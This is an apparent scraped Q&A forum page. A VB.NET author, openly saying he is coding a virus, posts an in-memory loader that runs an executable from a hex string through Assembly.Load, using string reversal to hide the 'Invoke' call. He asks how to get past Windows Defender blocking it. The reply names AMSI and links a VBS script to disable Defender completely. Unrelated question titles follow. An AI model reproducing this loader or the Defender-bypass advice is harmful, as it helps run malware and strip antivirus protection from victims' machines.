Operation did not complete successfully because the file contains a virus or potentially unwanted software. (Exception from HRESULT: 0x800700E1)
Guys I have problem while coding in vb.net in visual studio. Here's my code which will convert .EXE file Hex to byte and directly run from memory.
Imports System.Linq,System.Reflection
Public Module Module1
Public Sub Main()
Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Dim q1 As Object = Assembly.Load(HexToByte(n))
Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)
End Sub
Public Function HexToByte(ByVal str As String) As Byte()
Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
Return xData
End Function
End Module
When I debug it using F5 key, it shows full message as below:
System.BadImageFormatException:
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies.
An attempt was made to load a program with an incorrect format.'
And also
Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
(Exception from HRESULT: 0x800700E1)
Guys as these messages states that I am coding a virus and also it is true.
But I have using this code a lot of times but it didn't return any exception.
But now it is doesn't allows me.
How to fix that thing ???
As it mentions that it contains a virus,
So probably AMSI(Win Defender Component) is blocking the virus from being running,
As this error message also occurs in powershell when executing malicious command,
And hence AMSI stops it, info taken from 0x00-0x00.github.io
Run this VBS script to disable defender completely,
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs
- DataTable already belongs to another DataSet
- VB6 and VB.net has different outcomes with the same IF statements
- Preventing overwriting values one from another of the same application but different windows/tabs with different ID as query string
- The name does not exist in the namespace error in XAML
- How do I determine a mapped drive's actual path?
- Fast way to enumerate all files including sub-folders
- variable is not declared. it may be inaccessible due to its protection level
- VB.net string comparison with Powershell return output
- How can I display a DateTimePicker in a DataGridView?
- How to receive handle of second Monitor / Desktop
- Cannot set startup object in WPF VB.NET Project
- Can we have Class.Empty Object like we have in String.Empty
- #If DEBUG is ignored (VB.net or C#)
- How do I create a comma delimited string from an ArrayList?
- List files in ListBox without filepath in Visual Basic
- Sorting an array of folder names like Windows Explorer (Numerically and Alphabetically) - VB.NET
- Using Linq to select multiple values with reflection VB.NET
- How do I get the currently loggedin Windows account from an ASP.NET page?
- Iterate through Windows forms and close them?
- .NET 8 Desktop ClickOnce deploy System.Deployment error
- Public static class and methods not found in NuGet package
- Intermittent Crystal Reports error "The request could not be submitted for background processing."
- How to get product name and product description from AssemblyInfo?
- Is there any way to automate windows forms testing?
- Crystal Reports: "Failed to Save Document" after changing Datasource
- Get all the folders and sub-folders in side a directory
- Remove border from alt text if image url is not valid
- Setting Oracle.DataAccess.Client DllPath for Windows Installer Project
- Sample Code: VB getNamedItem XML attribute in Microsoft MSXML.DOMDocument
- ASP/VB - Gridview - Get row when checkbox is checked